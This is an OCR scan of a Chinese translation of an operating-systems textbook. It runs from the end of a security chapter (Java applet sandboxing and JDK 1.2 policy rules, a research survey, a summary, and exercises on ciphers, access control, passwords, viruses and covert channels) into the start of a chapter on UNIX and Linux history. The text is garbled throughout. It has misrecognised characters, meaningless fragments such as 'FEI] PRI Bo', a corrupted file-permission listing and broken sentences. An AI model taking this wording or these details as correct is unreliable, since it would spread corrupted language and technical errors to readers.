5) 是 个 非法 地 将 变量 从 一 种 类 型 转换 为 妨 一 种 类 型 ? 


如 果 Applet 通 过 了 所 有 的 测试 ， 它 就 能 被 安全 地 执行 并 且 不 用 担心 
它 会 访问 非 自 己 所 有 内 存 空间 。 








但 是 Applet 也 可 以 通过 调用 Java 方 法 (过 程 ) 来 执行 系统 调用 。 
Java 处 理 这 种 调用 的 方法 也 在 不 断 在 进步 。 在 最 初 的 Java 版 本 JDK (Java 
Development Kit) 1.0 里 ，Applet 被 分 为 两 类 : 可 信 的 与 不 可 信 的 。 从 本 


地 磁盘 取出 的 Applet 是 可 信 的 并 被 允许 执行 任何 所 需要 的 系统 调用 。 相 
反 ， 从 Internet 获 取 的 Applet 是 不 可 信 的 。 它 们 被 限制 在 沙 盒 里 运行 ， 如 
图 9-38 所 示 ， 实 际 上 并 不 能 做 什么 事 。 


在 从 这 一 模式 中 取得 了 些 经 验 后 ，Sun 公 司 认 为 对 Applet 的 限制 太 
大 了 。 在 JDK 1.1 版 本 里 ， 引 入 了 版 本 标注 。 当 Applet 从 Internet 传 递 过 来 
后 ， 系 统 首先 查看 Applet 是 否 有 用 户 信任 的 个 人 或 组 织 标注 (通过 用 户 
所 信任 的 标注 者 列表 来 定义 ) 。 如 果 是 ，Applet 就 被 允许 做 任何 操作 ， 
否则 就 必须 在 沙 盒 里 运行 并 且 受 到 很 强 的 限制 。 


在 获取 了 一 些 经 验 后 ， 代 码 标注 也 不 那么 令 人 满意 了 ， 所 以 安全 模 
式 双 有 了 变化 。JDK 1.2 版 本 提供 了 一 套 可 配置 的 严密 的 安全 策略 ， 针 
对 包含 本 地 和 异地 所 有 的 Applet。 安 全 模式 非常 复杂 导致 需要 整整 一 本 
书 来 描述 〈Gong,1999) ， 我 们 仅仅 归纳 出 一 些 精 华 的 部 分 。 








每 一 个 Applet 具 有 两 个 特性 :来源 于 何 处 以 及 谁 签 绪 了 它 。 来 源 于 
何 处 是 指 URL; 谁 签署 了 它 是 指 签 名 所 用 的 私 钥 。 每 个 用 户 都 能 创建 包 
含 规则 列表 的 安全 集 略 。 规 则 列 出 了 URL、 签 署 者 、 对 象 以 及 如 果 
Applet 的 URL 和 签 敬 者 匹配 规则 时 可 在 对 象 上 执行 的 动作 。 从 概念 上 来 
说 ， 上 述 信息 如 图 9-39 所 示 ， 里 然 真 正 的 格式 有 所 不 同 并 且 与 Java 的 类 
等 级 有 关 。 















































URL 签署 者 OR 动作 
www.taxprep.com TaxPrep | Jusr/susan/1040.xls | Read | 

| | /usr/tmp/* | Read, Write 

| www.microsoft.com | Microsoft | /usr/susan/Office/— Read, Write, Delete | 





图 9-39 JDK 1.2 所 指定 的 某 些 保护 规则 的 实例 


其 中 的 一 种 允许 的 动作 是 访问 文件 。 该 动作 可 以 指定 菜 一 特定 的 文 
件 或 目录 ， 给 定 目 录 下 的 所 有 文件 ， 或 给 定 目 录 下 所 有 的 文件 和 子 目 录 
的 递归 集合 。 图 9-21 的 三 行 包含 了 3 种 情况 。 在 第 一 行 里 ， 用 户 Susan 建 
并 了 她 的 许可 文件 ， 这 样 来 自 她 的 税务 预备 用 计算 机 ， 
www.taxprep.com， 并 由 该 公司 签名 的 Applet 可 以 访问 位 于 1040.xls 文 件 
里 的 她 的 税务 数据 。 这 是 惟一 可 读 的 文件 ， 并 且 任 何其 他 的 Applet 都 不 
能 读 。 而 且 ， 来 自 于 所 有 资源 的 所 有 Applet， 无 论 是 否 签名 ， 都 可 以 读 
写 /usr/tmp 中 的 文件 。 


而 且 ，Susan 也 信任 Microsoft， 让 来 自 于 该 公司 站 点 并 签名 过 的 
Applet 读 、 写 或 删除 Office 目 录 下 的 所 有 文件 。 例 如 ， 修 复 bug 并 安装 新 
的 软件 版 本 。 为 了 校 验 签名 ，Susan 要 么 在 她 的 磁盘 里 存放 公 钥 ， 要 么 
动态 地 获取 公 钥 ， 例 如 ， 在 持 有 她 所 信任 的 公司 的 公 钥 以 后 ， 使 用 该 公 
司 的 签名 证 书 格式 。 











文件 不 是 仅仅 要 保护 的 资源 。 网 络 访问 也 可 以 被 保护 。 被 保护 的 对 
象 是 特定 计算 机 的 特定 端口 。 每 一 台 计 算 机 由 一 个 IP 地 址 或 DNS 名 确 


E: 计算 机 上 的 端口 由 一 排 数字 确定 。 可 能 的 动作 包括 要 求 连接 远程 计 
算 机 以 及 接受 来 自 远程 计算 机 的 连接 。 通 过 这 种 方法 ，Applet 可 以 获得 
访问 网 络 的 权限 ， 但 仅 局 限于 与 许可 列表 中 明示 的 计算 机 进行 交谈 。 

Applet 可 以 动态 地 装 入 所 需 的 附加 代码 《〈 类 ) ， 但 用 户 提 供 的 关 装 载 需 
可 以 精确 地 控制 由 哪 台 计算 机 产生 这 样 的 类 。 当 然 还 有 其 他 大 量 的 安全 


特性 。 








99 有 关 安 全 性 研究 


计算 机 安全 性 是 一 个 非常 热门 的 话题 ， 很 多 人 都 在 研究 。 其 中 一 个 
重要 的 话题 就 是 可 信 计 算 ， 尤 其 是 可 信 计 算 的 平台 (Erickson, 2003; 
Garfinkel“ A, 2003; Reid 和 Caelli，2005 以 及 Thibadeau，2006) 和 相 
关 的 公共 政策 话题 (Anderson, 2003) 。 信 息 流 的 模型 和 实现 是 一 个 正 


在 研究 的 话题 (Castro 等 人 ，2006; Efstathopoulos 等 人 ，2005; Hicks 等 











人 ，2007 和 Zeldovich 等 人 ，2006) 。 


用 户 验 证 (包括 生物 学 识别 ) 仍然 是 很 重要 的 〈BhargavSpantzel 等 
人 ，2006; Bergadano 等 人 ，2002; Pusara 和 Brodley，2004; Sasse, 
2007 以 及 Yoon 等 人 ，2004) 。 


各 种 恶意 软件 被 广泛 地 研究 ， 包 括 特 洛 伊 木 马 (Agrawal A, 
2007; Franz，2007 和 Moffie 等 人 ，2006) 、 病 毒 (Bruschi 等 人 ，2007; 
Cheng 等 人 ，2007 和 Rieback 等 人 ，2006) . E (Abdelhafez 等 人 ， 
2007; Jiang 和 Xu，2006; Kienzle 和 Elder，2003 以 及 Tang 和 Cheng， 
2007) 、 间 谍 软 件 CEgele“# A, 2007; Felten 和 Halderman，2006 以 及 

等 人 ，2006) 和 rootkit (Kruegel 等 人 ，2004; Levine 等 人 ，2006; 
Quynh 和 Takefuji，2007 以 及 Wang 和 Dasgupta，2007) 。 既 然 病毒 、 间 
谍 软 件 和 rootkit 都 会 尽力 地 隐藏 ， 那 么 就 会 有 关于 stealth 技 术 的 工作 以 
及 它们 怎么 样 才能 被 侦 测 到 (Carpenter 等 人 ，2007; Garfinkel 等 人 ， 


2007 以 及 Lyda 和 Hamrock，2007) 。 加 密 技 术 本 身 也 要 被 检查 
(Harmsen 和 Pearlman，2005 以 及 Kratzer 等 人 ，2006) 。 


9.10 ”小 结 





计算 机 中 经 第 会 包含 有 价值 的 机 密 数 据 ， 包 括 纳 税 申请 单 、 信 用 卡 
账号 、 商 业 计划 、 交 易 秘 密 等 。 这 些 计算 机 的 主人 通常 非常 淘 望 保证 这 
些 数据 是 私人 所 有 ， 不 会 被 窜改 ， 这 就 迅速 地 导致 了 我 们 要 求 操作 系统 
一 定 要 有 好 的 安全 性 。 一 种 保证 信息 机 密 的 方法 是 把 它 加 密 并 受 善 地 保 
管 密 铀 。 有 时 候 提供 数字 信息 的 验证 是 很 重要 的 ， 在 这 种 情况 下 ， 可 以 
使 用 加 密 散 列表 、 数 字 签 名 ， 以 及 修一 个 可 信 的 证 书 验 证 机 构 所 签名 的 
证 书 。 





对 信息 的 访问 权限 可 以 模型 化 为 一 个 大 和 沧 阵 ， 行 表示 域 (用 户 ) ， 
列表 示 对 象 〈 文 件 ) 。 每 一 个 元 系 表 示 相 应 的 域 对 相应 对 象 的 访问 权 
限 。 因 为 这 个 矩阵 是 稀 牙 的 ， 所 以 它 可 以 按 行 存储 ， 这 样 就 成 了 一 个 能 
力 链表 ， 表 示 采 一 域 能 够 做 什么 ;或 者 黎 葡 矩阵 也 可 以 按 列 存储 ， 这 样 
束 成 了 一 个 访问 控制 链表 ， 表 示 谁 并 且 如 何 访问 这 个 对 象 。 使 用 正式 的 
建 模 技术 ， 系 统 里 的 信息 流 可 以 被 模型 化 并 受到 限制 。 但 是 ， 有 时 利用 
隐秘 的 通道 还 是 可 以 泄露 出 去 的 ， 比 如 调整 CPU 的 利用 率 。 








在 任何 一 个 安全 的 系统 一 定 要 认证 用 户 。 这 可 以 通过 用 户 知道 的 、 
用 户 拥有 的 ， 或 者 用 户 的 吴 份 “生物 测定 ) 来 完成 。 使 用 双 因 素 的 号 份 
认证 ， 比 如 虹膜 扫描 和 口令 ， 可 以 加 强 安全 性 。 





代码 中 有 很 多 bug 可 以 被 利用 来 控制 程序 和 系统 。 这 些 包括 缓冲 区 
溢出 、 格 式 串 攻击 、 返 回 libc 攻 击 、 整 数 溢出 攻击 、 代 码 注入 攻击 和 特 
权 扩 大 攻击 。 





Intermet 上 亿 布 恶意 软件 ， 有 特洛伊 森马、 病毒 、 蠕 虫 、 间 谍 软 件 和 
rookit。 每 一 个 都 对 数据 机 密 性 和 一 致 性 产生 着 威胁 。 更 糟糕 的 是 ， 恶 
意 软 件 攻击 可 能 会 控制 一 全 机器， 并 把 这 全 机 天 变 成 一 台 僵 尸 机 器 用 来 
发 送 垃圾 邮件 或 者 发 起 其 他 的 攻击 。 











幸运 的 是 ， 系 统 有 很 多 种 方法 来 保护 自己 。 最 好 的 策略 就 是 全 面 防 
季 ， 使 用 多 种 技术 一 起 防御 。 这 些 技术 有 防火 墙 、 病 毒 扫 描 、 代 人 码 签 
名 、 办 茶 、 入 侵 检 测 ， 以 及 封装 移动 代码 。 


习题 


1. 破 译 下 列 的 单一 字符 替换 密 文 。 明 文 包 含 的 仅仅 是 字母 ， 并 且 是 
Lewis Carroll 的 著名 诗歌 。 





kfd ktbd fzm eubd kfd pzyiom mztx ku kzyg ur bzha kfthcm 
ur mfudm zhx mftnm zhx mdzythc pzq ur ezsszcdm zhx gthcm 
zhx pfa kfd mdz tm sutythc fuk zhx pfdkfdi ntcm fzld pthcm 
sok pztk z stk kfd uamkdim eitdx sdruid pd fzld uoi efzk 

rui mubd ur om zid uok ur sidzkf zhx zyy ur om zid rzk 

hu foiia mztx kfd ezindhkdi kfda kfzhgdx ftb boef rui kfzk 


2. 假 设 有 一 个 私密 密 钥 使 用 了 26x26 和 矩阵 ， 行 与 列 都 以 ABC...Z 开 
头 。 明 文 每 次 用 两 个 字符 加 密 。 第 一 个 字符 是 列 ， 第 二 个 字符 是 行 。 
个 单元 由 包含 两 个 密 文 字符 的 行 和 列 交 叉 组 成 。 这 样 的 矩阵 必须 有 些 什 
么 限制 ? 共有 多 少 个 密 钥 ? 


3. 私 密 密 钥 机 制 比 公 钥 机 制 更 有 效 ， 但 需要 发 送 者 和 接收 者 事先 共 
用 一 个 密 铀 。 假 设 发 送 痢 和 接收 者 从 未 碰 到 过 ， 但 有 可 信 的 第 三 方 与 发 
送 方 共享 密 钥 与 接收 方 也 共享 密 钥 〈 另 一 个 ) 。 那 么 发 送 方 和 接收 方 如 











何在 这 种 环境 下 建立 一 个 新 的 共享 密码 体制 ? 

4. 举 一 个 简单 例子 说 明 一 个 数学 函数 ， 对 一 级 近似 来 说 这 一 函数 是 
FEI] PRI Bo 

5. 假 设 有 A 和 B 两 个 陌生 人 想 使 用 对 称 密 钥 加 密 和 对 方 交 流 ， 但 是 没 
有 共 孚 对 称 钥匙 。 假 设 他 们 俩 都 信任 第 三 方 C，C 的 公 钥 是 大 家 都 知道 
的 。 在 这 种 情况 下 两 个 陌生 人 如 何 建立 一 个 新 的 对 称 密 钥 ? 





6. 假 设 一 个 系统 在 某 时 有 1000 个 对 象 和 100 个 域 。 在 所 有 域 中 19% 的 
对 象 是 可 访问 的 〈r、w 和 x 的 某 种 组 合 ) ， 两 个 域 中 有 10% 的 对 象 是 可 
访问 的 ， 剩 下 89% 的 对 象 只 在 惟一 一 个 域 中 才 可 访问 。 假 设 需要 一 个 单 
位 的 空间 存储 访问 权 (r、w 和 x 的 某 种 组 合 ) 、 对 象 ID 或 一 个 域 ID。 分 
别 需要 多 少 空间 存储 全 部 的 保护 矩阵 、 作 为 访问 控制 表 的 保护 矩阵 和 作 
为 能 力 表 的 保护 矩阵 ? 








7. 我 们 讨论 过 的 两 种 保护 机 制 有 能 力 表 和 访问 控制 表 。 对 于 下 面 每 
个 保护 问题 ， 请 问 应 该 使 用 哪个 机 制 。 


a)Ken 希 望 除了 他 的 某 位 办 公 室 的 同事 之 外 ， 其 他 所 有 人 都 可 以 读 
到 他 的 文件 。 


b)Mitch 和 和 Steve 想 要 共享 一 些 秘密 文件 。 


QLinda 想 要 她 一 部 分 的 文件 是 公开 的 。 


8. 说 出 在 这 个 UNIX 目 录 里 所 列 保护 矩阵 的 所 有 者 和 操作 权限 。 请 
注意 ，asw 属 于 两 个 组 : users 和 devel; gmw 仅 仅 是 users 组 的 成 员 。 把 两 
个 成 员 和 两 个 组 当 作 域 ， 和 矩阵 就 有 四 行 〈 每 个 域 一 行 ) 和 四 列 《〈 每 个 文 
fE—F\) a 





-IW-[--[-- 2 gmw users 908 May2616:45 PPP-Notes 
—rwxt-xt-x 1 asw devel 42 May1312:35 progi 
-[W-rW---- 1 asw users 50094 May3017:51 project.t 
-MW-[----- 1 asw devel 13124 May3114:30 splash.gif 


9. 把 前 一 个 问题 中 的 内 容 作 为 访问 列表 ， 说 出 每 个 所 列 目录 的 操作 
权限 。 





10. 在 保护 权限 的 Amoeba 架 构 里 ， 用 尸 可 要 求 服务 需 产 生 一 个 部 有 
部 分 权限 的 新 权限 ， 并 可 转移 给 用 户 的 朋友 。 如 采访 朋友 要 求 服务 器 移 
去 更 多 的 权限 以 便 转 移 给 其 他 人 的 话 ， 会 发 生 什么 情况 呢 ? 


11. 在 图 9-13 里 ， 从 进程 B 到 对 象 1 没有 箭头 。 可 以 允许 存在 这 类 箭 
头 吗 ? 如 采 存 在 ， 它 破坏 了 什么 原则 ? 


12. 如 末 在 图 9-13 里 允许 消 轧 从 进程 传递 到 进程 ， 这 样 符合 的 是 什么 
原则 ? 特别 对 进程 B 来 说 ， 它 可 以 对 哪些 进程 发 送 消息 ， 哪 些 不 可 以 ? 








13. 请 看 图 9-16 所 示 的 隐 写 术 。 每 个 像素 由 色彩 空间 的 点 表示 ， 该 点 
处 在 其 轴 为 R、G、 和 B 值 的 三 维系 统 中 。 在 使 用 这 个 空间 时 ， 请 解释 在 





图 片 中 如 果 使 用 了 隐 写 术 ， 对 分 辨认 有 何 影 啊 ? 


14. 采 用 各 种 压缩 算法 ASCII 文 件 里 的 自然 语言 可 被 压缩 至 少 50%。 
如 果 采 用 在 1600x1200 图 片 中 每 个 像素 低位 插入 ASCII 文 本 的 方法 ， 隐 和 写 
术 可 写 入 的 容量 大 小 为 多 少 个 字 节 ? 图 片 尺 寸 将 增加 到 多 少 假 设 没 有 
加 密 数据 也 没有 由 加 密 带 来 的 扩展 ) ? 这 种 方法 的 效率 即 负载 /〈 所 传 
送 的 字 节 ) BK? 











15. 假 设 一 组 紧密 联系 的 持 不 同 政见 者 在 被 压制 的 国家 使 用 隐 写 术 
发 送 有 关 该 国 的 状况 消 轧 到 国外 ， 政 府 意 识 到 这 一 点 并 发 送 含有 虚假 信 
恩 的 伪造 图 片 。 这 些 持 不 同 政见 者 如 何 告诉 人 们 来 区 分 真实 的 消 轧 和 错 


误 的 消息 ? 


16. 去 www.cs.vu.nl/ast 网 站 点 击 covered writing 链 接 。 按 照 指 令 抽 取 
剧本 。 回 答 下 面 的 问题 : 





(a) 原 始 的 斑马 纹 和 斑马 纹 文件 的 大 小 是 多 少 ? 
(b) 斑 马 纹 文件 中 秘密 地 存储 了 什么 剧本 ? 


(O) 斑 马 弘文 件 中 秘密 地 存储 了 多 少 字 市 ? 











17. 让 计算 机 不 回 显 密码 比 回 显 星 号 安全 些 。 因 为 回 显 出 星 号 会 让 
屏 帮 周 围 的 人 知道 密码 的 长 度 。 假 设 密码 仅 包 括 大 小 写字 母 和 数字 ， 密 
码 长 度 必须 大 于 5 个 字符 小 于 8 个 人 字符， 那么 在 不 出 现 回 显 时 有 多 安全 ? 





18. 在 得 到 学 位 证 书后 ， 你 申请 作为 一 个 大 学 计算 中 心 的 管理 者 。 
这 个 计算 中 心 正好 淘汰 了 旧 的 主机 ， 转 用 大 型 的 LAN 服 务 器 并 运行 
UNIX 系 统 。 你 得 到 了 这 个 工作 。 工 作 开始 15 分 钟 后 ， 你 的 助理 冲 进来 
叫 道 ,“ 有 的 学 生发 现 了 我 们 用 来 加 密 密 码 的 算法 并 贴 在 Internet。” 那 么 











19.Morris-Thompson 玉 用 n 位 随机 人 码 ( 盐 〉 的 保护 模式 使 得 入 侵 者 很 
难 发 现 大 量 事先 用 普通 字符 串 加 密 的 密码 。 当 一 个 学 生 试图 从 自己 的 计 
算 机 上 猜 出 超级 用 户 密码 时 ， 这 一 结构 能 提供 安全 保护 吗 ? 假设 密码 文 
件 是 可 读 的 。 


20. 请 解释 UNIX 口 令 机 制 与 加 密 原 理 的 不 同 。 


21. 假 设 一 个 黑客 可 以 得 到 一 个 系统 的 密码 文件 。 系 统 使 用 有 n 位 salt 
的 Morris-Thompson 保 护 机 制 的 情况 相对 于 没有 使 用 这 种 机 制 的 情况 
下 ， 黑 客 需 要 多 少 额 外 的 时 间 和 破解 所 有 密码 。 


22 请 说 出 3 个 有 效 地 采用 生物 识别 技术 作为 登录 认证 的 特征 。 





23. 某 个 计算 机 科学 系 有 大 量 的 在 本 地 网 络 上 的 UNIX 机 器 。 任 何 机 
器 上 的 用 户 都 可 以 以 


rexec machine4 who 








的 格式 发 出 命令 并 在 machine4 上 执行 ， 而 不 用 远程 登录 。 这 一 结果 
是 通过 用 户 的 核心 程序 把 命令 和 UID 发 送 到 远程 计算 机 所 完成 的 。 在 这 
一 系统 中 ， 核 心 程序 是 可 信任 的 吗 ? 如 果 有 些 计算 机 是 学 生 的 无 保护 措 
施 的 个 人 计算 机 呢 ? 


24. 在 UNIX 系 统 里 使 用 密码 与 Lamport 登 录 到 非 安 全 网 络 的 架构 有 何 
相同 点 ? 


25.Lamport 的 一 次 性 密码 技术 采用 的 逆序 密码 。 这 种 方法 比 第 一 次 
用 f(s)， 第 二 次 用 f(f(s)) 并 依次 类 推 的 方法 更 简单 吗 ? 


26. 使 用 MMU 硬 件 来 阻止 如 图 9-24 的 溢出 攻击 可 行 吗 ? 解释 为 什 


~ 
~ 








27. 请 列 出 C 编 译 器 的 一 种 可 大 量 减少 安全 漏洞 的 特性 。 为 什么 这 种 
特性 没有 被 广泛 使 用 ? 


28. 特 洛 伊 木马 可 以 在 由 权限 保护 的 系统 中 工作 吗 ? 





29. 在 删除 文件 时 ， 文 件 块 被 放 回 空间 块 列表 ， 但 并 没有 被 清除 。 
你 认为 让 操作 系统 在 释放 之 前 首先 清除 每 个 文件 块 是 个 好 办 法 吗 ? 请 从 
这 两 种 做 法 的 安全 性 和 性 能 分 别 考 虑 ?并 解释 每 种 操作 的 效果 ? 





30. 寄 生病 毒 如 何 保证 a) 在 主 程序 运行 前 自己 先 运行 ? b) 完 成 自己 的 
操作 后 把 控制 权 交 还 给 主 程序 ? 


31. 有 些 操作 系统 需要 在 磁道 的 开始 处 设置 磁盘 分 区 。 这 对 引导 区 
病毒 来 说 有 什么 便利 ? 








32. 改 变 图 9-27 所 示 的 程序 ， 让 它 找 到 所 有 的 C 语 言 程序 而 不 是 可 执 
行程 序 。 

33. 图 9-32d 所 示 的 病毒 被 加 密 过 。 反 病毒 实验 室 的 科学 家 如 何 判断 
哪 部 分 文件 是 加 密 密 钥 以 便 能 够 解密 病毒 代码 并 反问 恢复 ?Virgil 如 何 
才能 让 这 些 科学 家 的 工作 更 困难 ? 





34. 图 9-32c 的 病毒 同时 有 压缩 程序 和 解压 缩 程序 。 解 压缩 程序 用 来 
展开 并 运行 被 压缩 的 可 运行 程序 ， 那 么 压缩 程序 用 来 做 什么 呢 ? 





35. 从 病毒 制作 者 的 观点 出 发 ， 说 出 多 形态 加 密 病毒 的 一 个 缺点 。 
36. 通 常人 们 把 下 列 操作 看 作 是 受到 病毒 攻击 后 的 恢复 措施 : 
a) 启 动 被 感染 的 系统 。 

b) 把 所 有 文件 备份 到 外 部 存储 介质 。 

c 运 行 frdisk 格 式 化 磁盘 。 

d) 从 原版 的 CD-ROM 重 新 安装 操作 系统 。 


e) 从 外 部 存储 介质 重新 深入 文件 。 


请 说 明 上 述 操 作 中 的 两 个 错误 。 





37. 在 UNIX 里 可 能 存在 共事 者 病毒 吗 ( 不 改动 已 有 文件 的 病毒 ) ? 
如 果 可 能 ， 为 什么 ? 如 果 不 可 能 ， 为 什么 ? 


38. 病 毒 和 蠕虫 的 区 别 是 什么 ”它们 分 别 是 如 何 繁殖 的 ? 


39. 目 解压 缩 文 件 ， 把 一 个 或 多 个 文件 以 及 一 个 提取 程序 压缩 在 一 
起 ， 通 第 用 作 发 布 程序 或 升级 程序 。 请 讨论 这 种 文件 的 安全 特性 。 


40. 讨 论 用 茶 个 程序 做 输入 ， 写 一 个 判断 此 输入 程序 是 人 否 含 有 病毒 
程序 的 可 能 性 。 


41.9.8.1 节 描述 了 通过 一 系列 防火 墙 规 则 将 外 界 访 问 限制 在 仅 有 的 
三 个 服务 上 。 请 描述 男 一 个 能 添加 到 此 防火 墙 上 的 规则 集 ， 使 得 对 这 些 
服务 的 访问 受到 进一步 严格 的 限制 。 


42. 在 某 些 计算 机 上 ， 图 9-37b 使 用 的 SHR 指 令 用 “0” 来 填充 未 被 使 用 
的 位 ， 而 其 他 位 向 右 移 。 对 图 9-37b 来 说 ， 使 用 不 同 的 移 位 指令 对 正确 
性 是 否 存在 影响 ”如 果 有 影响 ， 哪 种 移 位 方法 更 好 一 些 ? 








43. 要 校 验 Applet 是 否 由 可 信 的 供应 商标 记 ，Applet 供 应 商 可 以 提供 
由 可 信 第 三 方 签 普 的 证 书 ， 其 中 包括 其 公 钥 。 但 是 读 取证 书 用 户 需 要 可 
言 第 三 方 的 公 钥 。 这 可 由 第 四 方 提供 ， 但 是 用 户 义 需要 第 四 方 的 公 钥 。 
这 看 上 去 没有 办 法 解决 验证 系统 ， 然 而 实际 上 浏览 融 却 可 以 做 到 。 为 什 


44. 摘 述 使 得 Java 成 为 比 C 能 写 出 更 安全 的 程序 的 编程 语言 的 三 个 特 
征 。 


45. 假 设 你 的 系统 使 用 JDK 1.2。 给 出 允许 一 个 来 自 
www.appletsRus.com 的 小 应 用 程序 在 你 的 机 器 上 运行 时 你 使 用 的 规则 
《类 似 图 9-39 中 的 那些 规则 ) 。 这 个 小 应 用 程序 可 能 从 
www.appletsRus.com 中 下 载 额 外 的 文件 ， 在 /usrvtmp/ 中 读 写 文件 ， 也 
从 /usr/me/appletdir 中 读 文件 。 


46. 用 C 语 言 或 shell 脚 本 写 一 对 程序 ， 通 过 UNIX 系 统 里 的 隐蔽 信道 
来 友 送 和 接收 消 轧 。 提 示 : 即使 当 文 件 不 可 访问 时 也 可 以 看 到 许可 位 ， 
通过 设置 其 参数 的 方法 ， 确 保 sleep 命 令 或 系统 调用 被 延迟 一 段 固定 的 时 
间 。 请 度量 在 一 个 空闲 系 统 上 的 数据 率 ， 然 后 通过 局 动 大 量 的 各 种 后 合 
进程 来 人 为 创建 较 大 的 负载 ， 再 次 计算 数据 率 。 





47. 一 些 UNIX 系 统 使 用 DES 算 法 加 密 密 码 。 这 些 系统 通常 连续 25 次 
应 用 DES 算 法 获得 加 密 密 码 。 从 网 上 下 载 一 个 DES 的 实现 ， 写 一 个 程序 
加 密 一 个 密码 ， 检 查 一 个 密码 对 这 个 系统 是 否 有 效 。 使 用 Morris- 
Thompson 保 护 机 制 产生 一 个 有 10 个 加 密 密 码 的 列表 。 使 用 16 位 盐 。 


48. 假 设 一 个 系统 使 用 访问 控制 表 维 护 它 的 保护 和 矩阵。 根据 如 下 情 
况 写 一 组 管理 函数 管理 访问 控制 表 : (1) 创 建 一 个 新 的 项 目 ; (2) 删 除 一 





个 对 象 ，(3) 创 建 一 个 新 域 ，(4) 删 除 一 个 域 ，(5) 新 的 访问 权限 (r、w 和 x 
的 茶 种 组 合 ) 被 授予 一 个 域 来 访问 一 个 对 象 ，(6) 撤 销 已 存在 的 对 一 个 域 
的 对 象 的 访问 权限 ; (7) 授 予 某 个 对 象 对 所 有 域 的 访问 权限 ; (8) 撤 销 东 
个 对 象 对 所 有 域 的 访问 权限 。 
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在 前 面 的 章节 中 ， 我 们 大 体 上 学 习 了 很 多 关于 操作 系统 的 原理 、 抽 
象 、 算 法 和 技术 。 现 在 分 析 一 些 具体 的 操作 系统 ， 看 一 看 这 些 原 理 在 现 
实 世 界 中 是 怎样 应 用 的 。 我 们 将 从 Linux 开 始 ， 它 是 UNIX 的 一 个 很 流行 
的 衍生 版 本 ， 可 以 运行 在 各 类 计算 机 上 。 它 不 仅 是 高 端 工作 站 和 服务 器 
上 的 主流 操作 系统 之 一 ， 还 在 移动 电话 到 超级 计算 机 的 一 系列 系统 中 得 
到 应 用 。Linux 系 统 也 体现 了 很 多 重要 的 操作 系统 设计 原理 。 











我 们 将 从 Linux 的 历史 以 及 UNIX 与 Linux 的 演化 开始 讨论 ， 然 后 给 
出 Linux 的 概述 ， 从 而 使 读者 对 它 的 使 用 有 一 些 概 念 。 这 个 概述 对 那些 
只 熟悉 Windows 系 统 的 读者 尤为 有 用 ， 因 为 Windows 系 统 实 际 上 对 使 用 
者 隐藏 了 几乎 所 有 的 系统 细节 。 虽 然 图 形 界面 可 以 使 初学 者 很 容易 上 
手 ， 但 它 提供 了 很 少 的 灵活 性 而 且 不 能 使 用 户 洞 察 到 系统 是 如 何 工作 
的 。 








接 下 来 是 本 间 的 核心 内 容 ， 我 们 将 分 析 Linux 的 进程 与 内 存 管理 、 
1/O、 文 件 系 统 以 及 安全 机 制 。 对 于 每 个 主题 ， 我 们 将 先 讨论 基本 概 
念 ， 然 后 是 系统 调用 ， 最 后 讨论 实现 机 制 。 


我 们 首先 应 该 解决 的 问题 是 ， 为 什么 要 用 Linux 作 为 例子 ?的 确 ， 
Linux 是 UNIX 的 一 个 衍生 版 本 ， 但 UNIX 目 身 有 很 多 版 本 ， 还 有 很 多 其 


他 的 衍生 版 本 ， 包 括 AIX、FreeBSD、HP-UX、SCO UNIX. System 
VSolaris 等 。 幸 运 的 是 ， 所 有 这 些 系统 的 基本 原理 与 系统 调用 大 体 上 是 
相同 的 〈 在 设计 上 ) 。 此 外 ， 它 们 的 总 体 实现 策略 、 算 法 与 数据 结构 也 
很 相似 ， 不 过 也 有 一 些 不 同 之 处 。 为 了 使 我 们 的 例子 更 具体 ， 最 好 选 定 
一 个 系统 然后 从 始 至 终 地 对 它 进行 讨论 。 因 为 大 多 数 读 者 相对 于 其 他 系 
统 而 言 更 容易 接触 到 Linux， 故 我 们 选中 Linux 作 为 例子 。 况 且 除 了 实现 
相关 的 内 容 ， 本 章 的 大 部 分 内 容 对 所 有 UNIX 系 统 都 是 适用 的 。 有 很 多 
书籍 介绍 怎样 使 用 UNIX， 但 也 有 一 些 介绍 其 高 级 特性 以 及 系统 内 核 
(Bovet#llCesati, 2005; Maxwell, 2001; McKusick 和 Neville-Neil, 











2004; Pate, 2003; Stevens#l/Rago, 2008; Vahalia, 2007) 


10.1 UNIX 与 Linux 的 历史 


UNIX 与 Linux 有 一 段 漫长 而 又 有 趣 的 历史 ， 因 此 我 们 将 从 这 里 开始 
我 们 的 学 习 。UNIX 开 始 只 是 一 个 年 轻 的 研究 人 员 (Ken Thompson) 的 
业余 项 目 ， 后 来 发 展 成 价值 数 十 亿美 元 的 产业 ， 涉 及 大 学 、 跨 国 公司 、 
政府 与 国际 标准 化 组 织 。 在 接 下 来 的 内 容 里 我 们 将 展开 这 段 历史 。 


10.1.1 UNICS 


回 到 20 世 纪 40 一 50 年 代 ， 当 时 使 用 计算 机 的 标准 方式 是 签约 租用 一 
个 小 时 的 机 时 ， 然 后 在 这 个 小 时 内 独占 整 台 机 器 。 至 少 从 这 个 角度 ， 所 
有 的 计算 机 都 是 个 人 计算 机 。 当 然 ， 这 些 机 器 体积 庞大 ， 在 任何 时 候 只 
有 一 个 人 《程序 员 ) 能 使 用 它们 。 当 批 处 理 系统 在 20 世 纪 60 年 代 兴 起 
时 ， 程 序 员 把 任务 记录 在 打 孔 卡片 上 并 提交 到 机 房 。 当 机 房 积 累 了 足够 
的 任务 后 ， 将 由 操作 员 在 一 次 批 处 理 中 处 理 。 这 样 ， 往 往 在 提交 任务 一 
个 甚至 儿 个 小 时 后 才能 得 到 结果 。 在 这 种 情况 下 ， 调 试 成 为 一 个 费时 的 
过 程 ， 因 为 一 个 错位 的 逗号 都 会 导致 程序 员 当 费 数 小 时 。 


为 了 摆脱 这 种 公认 的 令 人 失望 且 没 有 效率 的 设计 安排 ，Dartmouth 
学 院 与 M.LT 发 明了 分 时 系统 。Dartmouth 系 统 只 能 运行 BASIC， 并 日 经 
历 了 短暂 的 商业 成 功 后 就 消失 了 。M.I.T 的 系统 CTSS 用 途 广 泛 ， 在 科学 








界 取 得 了 巨大 的 成 功 。 不 久之 后 ， 来 和 目 Bell 实 验 室 与 通用 电 右 《随后 成 
为 计算 机 的 销售 者 ) 的 研究 者 与 M.LTI 合 作 开始 设计 第 二 代 系 统 
MULTICS (MULTiplexed Information and Computing Service， 多 路 复 用 
言 息 与 计算 服务 ) ， 我 们 在 第 一 章 讨 论 过 它 。 








虽然 Bell 实 验 室 是 MULTICS 项 目的 创始 方 之 一 ， 但 是 它 后 来 撤 出 了 
